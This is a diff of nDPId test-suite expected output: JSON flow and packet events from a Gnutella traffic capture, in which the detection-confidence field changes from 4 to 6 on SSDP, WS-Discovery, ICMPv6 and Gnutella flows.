-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7447,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":591044,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":400872,"flow_last_seen":400901,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":399168,"flow_last_seen":399265,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7447,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":591044,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":595449,"flow_last_seen":595449,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":595449,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":1,"flow_last_seen":595449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":595449,"pkt":"AQBef\/\/6CAAn5uVZCABFAACl4L8AAAQR2X8KAAIP7\/\/\/+vnaB2wAkQ9eTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":595449,"flow_last_seen":595449,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":595449,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":595449,"flow_last_seen":595449,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":595449,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7483,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":2,"flow_last_seen":598465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":598465,"pkt":"AQBef\/\/6CAAn5uVZCABFAACl4MAAAAQR2X4KAAIP7\/\/\/+vnaB2wAkQ9eTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7484,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":2,"flow_last_seen":599325,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":599325,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHP8AAIARA\/wKAAIPCgAC\/wCKAIoA0XlAEQKcMQoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATVNFREdFV0lOMTAAAAAAAAoAARAAAA8BVaoA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":1,"flow_last_seen":599415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":834,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":834,"pkt_l4_len":780,"thread_ts_msec":599415,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFAwwRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgMMdjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_packet_id":1,"flow_last_seen":599415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":599415,"pkt":"AQBef\/\/6CAAn5uVZCABFAAMg4MEAAAER2gIKAAIP7\/\/\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"} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599426,"flow_last_seen":599426,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599426,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":1,"flow_last_seen":599426,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":599426,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOKkAAAAAQMAAAD\/AgAAAAAAAAAAAAAAAAAM"} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599426,"flow_last_seen":599426,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599426,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599426,"flow_last_seen":599426,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599426,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":2,"flow_last_seen":599529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":834,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":834,"pkt_l4_len":780,"thread_ts_msec":599529,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFAwwRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgMMdjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\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"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":2,"flow_last_seen":599747,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":599747,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOKkAAAAAQMAAAD\/AgAAAAAAAAAAAAAAAAAM"} 
00571{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7490,"source":"gnutella.pcap","alias":"nDPId-test","packets-captured":7490,"packets-processed":7468,"total-skipped-flows":0,"total-l4-payload-len":3617715,"total-not-detected-flows":478,"total-guessed-flows":2,"total-detected-flows":170,"total-detection-updates":3,"total-updates":298,"current-active-flows":169,"total-active-flows":801,"total-idle-flows":632,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3938,"global_ts_msec":600247} 
@@ -3956,12 +3956,12 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.23.75.69","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":131671,"flow_last_seen":551891,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3976,8 +3976,8 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490660,"flow_last_seen":490660,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":28681,"dst_port":9010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
